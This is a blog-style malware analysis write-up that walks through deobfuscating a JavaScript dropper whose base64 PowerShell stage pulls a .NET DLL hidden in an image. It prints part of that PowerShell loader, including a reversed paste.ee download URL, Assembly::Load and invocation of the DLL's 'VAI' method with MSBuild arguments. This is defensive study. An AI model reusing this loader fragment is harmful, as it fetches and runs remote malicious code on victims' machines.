[REPORT] Malware Analysis of an interesting sample

On April 26, Simplicio Liberatore (Malware Analyst at Leonardo), posted this:

img1

The link is to a twitter post that gives us even more information, sharing the image with the embedded malware, a screen of the initial js file and a snapshot of a loader function.

We have a lot of info, but I still think that as an exercise it is useful to retrace the analysis and write about it more in depth. So let’s start:

From the twitter post we can get the sample: https://bazaar.abuse.ch/sample/dff785934fc4c39f05e39e8abde6a033c81ede6d0435d99d7477c78b2ef2f50d/

Let’s take a quick look at the file.

img2

The file is pretty big and it looks like a repetition of the same code over and over. In addition, the code doesn’t seem to do much. It’s probably an obfuscation technique. My first idea was to identify the repeated parts and simply remove them with a replace script, but when I was playing around with the file I happened to open it with Geany, which conveniently had the “Symbols” tab open for me to see

img3

I scrolled through and Aha! There are some variables that are used very sparsely, which is a big contrast from the useless one repeated often. These variables are all more or less around the same area and if we go and look at them we can see that they are not used for the obfuscation of the js file but for something else. At this point I extracted all the lines that seemed interesting and reconstructed the deobfuscated (for now) script.

img4

Still as we can see the variables have something funky going on, in particular the use of Unicode characters to make everything hard to read. This is not a hard problem to solve. We can see in the code 2 “replace” methods called on the variables that remove the Unicode strings. If we apply manually those replace we obtain a much cleaner script.

img5

Now it’s much cleaner. The first line, which is cut, contains base64 encoded data, confirmed also by the “FromBase64String” seen below it. Even without knowing much of Javascript we can guess what is happening. The script is running (line 11) a shell (line 10) in hidden powershell (line 8) of what is contained in the variable “furled”. So, what we expect in furled is a powershell script. And here it is after base64 decoding.

img6

(in the screenshot some deobfuscation has already been applied so the original script after base64 might be slightly different…I forgot to screenshot ☺ )

So, what we have here? The bulk of the script dowloads an image and tries to extract something from it, this something is a base64 string betwen two placeholders («BASE64_START» and «BASE64_END»). If we open the image with a hex editor we can see that the base64 string occupies more than half of the image.

img7

We can write a script and get the base64 string which can be then decoded. What we obtain is a dll file. As can be seen by the MZ magic number and by the characteristics flag set in the file header.

img8

If we throw this program at VirusTotal we get that it is largely identified as virus but with some generic names. Zusy comes up a lot (but this sometimes is generic too) and in general we can guess this DLL is trying to do some UAC bypassing and inject the real malware. DiE says it is a VB.NET executable.

Lets go back to the Powershell script.

$smudgy = '0/fbbGSDXs/d/ee.etsap//:ptth';
//...
$truncature = [System.Reflection.Assembly]::Load($abbasi);
$alining = [dnlib.IO.Home].GetMethod('VAI').Invoke($null, [object[]] @($smudgy,'1','C:\Users\Public\Downloads','charoset','MSBuild','','','','','','','js','','','','2',''))

The final act of the script is calling the “VAI” method from the just loaded Dll, passing to it an array containing various info, like a reversed link to paste.ee, a path to the Download folder, “MSBuild” which is a build tool and some not better identified strings. Open up dnSpy and see what this file is doing.

By opening dnlib.IO.Home and looking at the “VAI” signature we can see what parameters have been passed:

img9

We can guess the original malware writer is portuguese speaking (caminho means path) and not much else without looking at the function implementation.

Work in progress…